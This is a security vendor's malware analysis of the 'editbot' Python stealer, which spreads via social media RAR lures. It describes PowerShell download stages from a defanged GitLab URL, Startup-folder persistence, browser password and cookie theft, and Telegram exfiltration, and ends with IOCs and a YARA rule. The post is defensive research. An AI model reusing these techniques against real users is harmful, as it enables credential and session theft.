Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) recently came across a WinRAR archive file on VirusTotal with minimal detection. Subsequent analysis revealed that it is part of a new campaign targeted at Social Media users.
- This campaign encompasses a multi-stage attack, where each phase has a distinct role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system.
- Threat Actors (TAs) use open-source code-sharing platforms, such as Gitlab, to retrieve the next stage payloads.
- The downloaded payload is a new Python-based stealer designed to pilfer process information and browser-stored data such as Passwords, cookies, Web data, and others. It uses the Telegram channel to exfiltrate stolen information to the TAs.
Overview
On December 5th, CRIL came across a potentially malicious RAR file on VirusTotal. The investigation unfolded rapidly as similar files began surfacing on VirusTotal within a short timeframe. The image below shows similar files identified in VirusTotal.
Subsequent investigation revealed that the identified archive file is linked to an ongoing scam targeting Social Media users. The scam revolves around the theme ‘defective product to be sent back.’ The TAs usually exploit the appeal of well-known products and compelling content to lure users into interacting with deceptive pages or groups.
As users comment on or like posts within these fake pages or groups, they inadvertently expand the reach of the fraudulent content, causing it to appear in their network’s news feeds. This helps the TAs spread their scam to a broader audience.
The image below displays a RAR attachment from this scam identified on social media, resembling the one we have identified in VirusTotal.
The identified RAR archive files contain a first-stage malicious batch file named “Screenshot Product Photo Sample.bat” and a JSON file named “manifest.json” (unused), as shown below.
Using the extracted BAT file, the TAs have tried to execute a multi-stage infection strategy to deliver their final payload onto the victim’s system.
The sequence of the infection chain is shown in the image below.
This final payload is a Windows-specific Python-based stealer designed to collect various sensitive information, such as passwords, cookies, web data, active system processes, etc. After gathering and compressing the stolen files, the stealer transmits them to a Telegram bot managed by the TAs.
In the absence of a specific name for this stealer, the term “editbot” is used to reference the malware for better tracking purposes. The name is used to designate the malware based on the author’s GitLab account or project name found in the repository.
Technical Analysis
When executing the extracted .bat file, it uses PowerShell commands to perform various download activities in the system, as shown in the figure below.
The first PS command downloads another .bat file from an open-source code-sharing platform (hxxps://gitlab[.]com/is9682048/rr/-/raw/main/startup) and saves it as “WindowsSecure.bat” in the user’s Startup folder, ensuring the execution of the downloaded BAT file during each login session.
The image below shows the newly downloaded BAT file in the startup location and its content.
The BAT file “WindowsSecure.bat” serves the purpose of ensuring persistence. It is designed to execute the Python stealer that will be downloaded at a later stage, specifically located at “C:UsersPublicDocumentlibb1.py” every time the system starts.
The second PowerShell command is employed to retrieve a ZIP file from the previously mentioned Gitlab location and save it locally as “Document.zip” within the ‘C:UsersPublic’ directory.
The third PowerShell command unzips the contents of the downloaded ZIP file into the directory ‘C:/Users/Public/Document,’ which includes a Python script along with its associated Python package files. The TAs took measures to guarantee a seamless execution of the main script by including all necessary components in the victim’s machine.
The below image shows the extracted content of the ZIP file.
The final PowerShell command executes the Python script named “libb1.py” found in the unzipped directory ‘C:UsersPublicDocument‘. This Python script serves as the malicious information stealer, which is identified as “editbot”.
Editbot – Python Stealer
The Python script “libb1.py,” appears to be a sophisticated piece of malware designed to collect sensitive information from various browsers, sending them to a specified TAs Telegram channel.
Upon executing the Python script through the batch file, the stealer runs the ‘tasklist’ command to enumerate all running processes on the targeted system. The obtained output is captured and saved in a file located at “C:Users<Username>AppDataLocalTemp<newly_generated_folder>window.txt“.
The newly generated folder name incorporates details such as the country code, IP address, and a timestamp extracted from the victim’s system, as shown in the figure below.
After collecting the list of currently running processes, the stealer focuses on extracting sensitive information from several web browsers, including Chrome, Firefox, Edge, Opera, Brave-Browser, CocCoc, and Chromium, as shown in the below code snippet figure.
Chromium-Based Browsers
The stealer retrieves files such as Cookies, Login Data, Web Data, and Local State from the respective browser profile folders, as shown in the previous figure. Upon identification, the stealer copies these files to a designated directory previously created by the stealer within the %temp% folder.
The below image shows the code for retrieving the browser profile files from the compromised system.
Then, the stealer extracts the login details from the obtained browser profile files such as “local state” and “login data”, decrypts the passwords, and saves the URL, username, and decrypted password into a newly created text file named “pass.txt.” This file is also located in the same directory created by the stealer within the %temp% folder.
The image below shows the code snippet to decrypt the browser login details.
After successfully collecting the passwords, the stealer connects to the SQLite database file named “Cookies,” which contains cookie information from various web browsers.
It proceeds to execute a query on the ‘cookies’ table, retrieving specific details like host, name, value, the HTTP-only attribute (‘is_httponly’), secure marking (‘is_secure’), and expiration time (‘expires_utc’).
The below image shows the code used to extract cookie information from the victim’s system.
After extracting cookie information, the stealer checks if the hostname is associated with a particular social media site. If so, the details are stored in ‘cookie.txt’ within the %temp% folder created by the stealer.
The image below shows the stealer code gathering cookies specifically related to social media platforms.
Firefox
The stealer uses a similar method to gather data from Mozilla Firefox as it does with Chromium-based browsers. For Firefox, the malware decrypts and captures login details stored in the ‘logins.json’ file, employing advanced techniques to obtain usernames and passwords. Additionally, it navigates through the ‘cookies.sqlite’ database, extracting information related to Social Media.
The below image shows the code used to extract data from Firefox browser profiles.
After successfully collecting all the information, the stealer creates a ZIP archive containing TXT files with the pilfered data and, subsequently, stores it in the %temp% directory.
The image below shows the ZIP file, ready for exfiltration.
Using a hardcoded bot token, the Stealer utilizes the “sendDocument” API to send the ZIP file from the victim’s system to TAs.
The image below shows the stealer’s POST request to a designated URL, accompanied by additional data. This data encompasses a caption featuring various details such as country, city, country code, system information, IP address, username, and a generated ID. The POST request also incorporates the inclusion of the ZIP file.
In July, Check Point researchers identified a comparable scam targeting Social Media users. The scam involved fake ads for ChatGPT, Google Bard, and other AI services, tricking users into downloading malware. This incident serves as another instance highlighting the persistent nature of threats on social media platforms.
Conclusion
The recent surge in Social Media scams has intensified as TAs adopt this method to distribute their payloads. Despite being a known campaign, these threat actors enhance sophistication and pose challenges for detection by leveraging the multi-stage nature of the attack.
Notably, the emergence of a new stealer suggests potential involvement by Initial Access Brokers, groups, or individuals specialized in acquiring and selling access or credentials to compromised systems.
The emergence of the new editbot Stealer, specifically targeting sensitive information related to social media platforms, raises significant concerns in the current cybersecurity threat landscape.
Our Recommendations
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices as mentioned below:
- Be cautious when receiving private messages on Social Media, especially from unknown or unexpected sources.
- Avoid interacting with messages that seem suspicious or contain unsolicited attachments.
- Confirm the authenticity of the sender before opening or downloading any attachments or clicking on links in Social Media messages.
MITRE ATT&CK® Techniques
Tactic | Technique ID | Technique Name |
Initial Access (TA0001) | Phishing (T1566) | This stealer could reach users via phishing sites. |
Execution (TA0002) | Command and Scripting Interpreter (T1059.001) | PowerShell commands are used to download and execute the stealer |
Discovery (TA0007) | Process Discovery (T1057) | The stealer captures all the running process |
Persistence (TA0003) | Startup Folder (T1547.001) | The stealer adds Startup for persistence |
Collection (TA0009) | Data from the Local System (T1005) | The Stealer collects sensitive data from victim’s system. |
Credential Access (TA0006) | Steal Web Session Cookie T1539 | Steal Web Session Cookie |
Credential Access (TA0006) | Credentials from Password Stores T1555 | Credentials from Password Stores |
Exfiltration(TA0010) | Exfiltration Over Web Service (T1567) | Uses Telegram channel to exfiltrate data |
Indicators of Compromise (IOCs)
Indicators | Indicator Type | Details |
fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7 feff390b99dfe7619a20748582279bc13c04f52a ca5bee4607ddd920729e5c2b4fc89bbc |
SHA256 SHA1 MD5 |
Screenshot-Product-Photo-Sample_25929.rar |
d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80 18e96d94089086848a0569a1e1d8051da0f6f444 e9e4cd111cadcf94c469365354df3fdc |
SHA256 SHA1 MD5 |
Screenshot Product Photo Sample.bat |
3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d eed59a282588778ffbc772085b03d229a5d99e35 669e7ac187fb57c4d90b07d9a6bb1d42 |
SHA256 SHA1 MD5 |
Python stealer (libb1.py) |
9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0 93d70f02b2ee2c4c2cd8262011ed21317c7d92de f23465088d26e90514b5661936016c05 |
SHA256 SHA1 MD5 |
product-_img_2023-12_86-13a30f_13373.rar |
bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa cf019e96e16fdaa504b29075aded36be27691956 c3a447c5c6c73d80490347c1b4afe9d5 |
SHA256 SHA1 MD5 |
image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat |
Yara Rule
rule Editbot_Stealer
{
meta:
author = “Cyble”
description = “Detects editbot Stealer”
date = “2023-12-11”
os = “Windows”
threat_name = “editbot Stealer”
scan_type = “file”
severity = 90
reference_sample = “3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d”
strings:
$a = “raw/main/editbot” ascii wide
$b = “libb1.py” ascii wide
$c = “cookiefb.txt” ascii wide
$d = “Local State” ascii wide
$e = “data_chromium” ascii wide
condition:
all of them
}
Source: https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/